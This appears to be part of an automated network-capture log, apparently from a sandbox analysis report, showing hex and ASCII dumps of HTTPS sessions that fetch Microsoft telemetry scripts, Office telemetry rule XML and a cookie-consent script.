                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC16384INData Raw: 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28 31 31 29 5d 3d 22 49 50 72 6f 6d 69 73 65 22 29 2c 61 2e 74 6f
                                                                                                                                                                                                                                                              Data Ascii: &&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(11)]="IPromise"),a.to
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC16384INData Raw: 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 59 28 65 2c 22 6c 69 73 74 65 6e 65 72 73 22 2c 7b 67
                                                                                                                                                                                                                                                              Data Ascii: on(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(e){Y(e,"listeners",{g
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 41 5b 74 65 5d 28 65 29 2c
                                                                                                                                                                                                                                                              Data Ascii: hComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4e 6c 28 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                              Data Ascii: fined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return null}function Nl(){retur
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b
                                                                                                                                                                                                                                                              Data Ascii: me failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(a,e){var o=this,c={};
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                                                                                                                                                                                                                              Data Ascii: ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageTags=function(e,t){var
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66
                                                                                                                                                                                                                                                              Data Ascii: otype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70 6c 69 63 65 22 2c 44 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                                                                                                                                                                                              Data Ascii: en",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="splice",Dg="toLowerCase
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28
                                                                                                                                                                                                                                                              Data Ascii: [lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              131192.168.2.104986113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                              x-ms-request-id: a0c05303-f01e-0000-2d91-3f193e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153219Z-174f7845968xr5c2hC1EWRd0hn0000000e1g000000004h5h
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              132192.168.2.104986213.107.246.634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                                                              Host: wcpstatic.microsoft.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:19 GMT
                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                              Content-Length: 52717
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                              Age: 30405
                                                                                                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                                                                                                              Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                                                              Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                              x-ms-request-id: 33786f00-e01e-00da-739a-40593e000000
                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153219Z-174f7845968swgbqhC1EWRmnb40000000x6000000000p4qy
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                                                                              Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                                                                              Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                                                                              2024-11-27 15:32:20 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              133192.168.2.104986313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                              x-ms-request-id: b578d01d-201e-003c-6391-3f30f9000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153220Z-174f7845968ljs8phC1EWRe6en0000000wxg00000000hd34
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
